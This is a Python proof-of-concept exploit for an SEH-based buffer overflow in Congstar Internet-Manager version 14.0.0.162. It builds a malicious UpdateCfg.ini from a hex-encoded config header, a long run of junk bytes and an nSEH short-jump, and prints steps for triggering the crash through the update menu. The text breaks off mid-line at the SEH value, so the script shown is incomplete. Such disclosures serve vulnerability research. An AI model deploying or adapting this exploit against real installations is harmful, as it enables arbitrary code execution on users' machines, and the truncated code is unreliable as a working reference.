#!/usr/bin/python #Exploit Title:Congstar Internet-Manager SEH Buffer Overflow #Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100) #Homepage:www.congstar.de/downloads/prepaid-internet-stick/ #Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip #Version:14.0.0.162 #Found:8.01.2015 #Exploit Author: metacom - twitter.com/m3tac0m #Tested on: Windows 7 En print "[*]Copy UpdateCfg.ini to C:\Program Files\congstar\Internetmanager\Bin\n" print "[*]Open Program and go to Menu-Options \n" print "[*]Click Update and press Now look for Update\n" print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen\n" from struct import pack buffer1 = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x55\x50\x44" buffer1 += "\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x5b\x53\x65\x72\x76\x69\x63\x65\x5d\x0a\x0a\x53" buffer1 += "\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e" buffer1 += "\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73\x70\x78\x0a" junk="\x41" * 18164 nseh="\xeb\x06\x90\x90" seh=pack('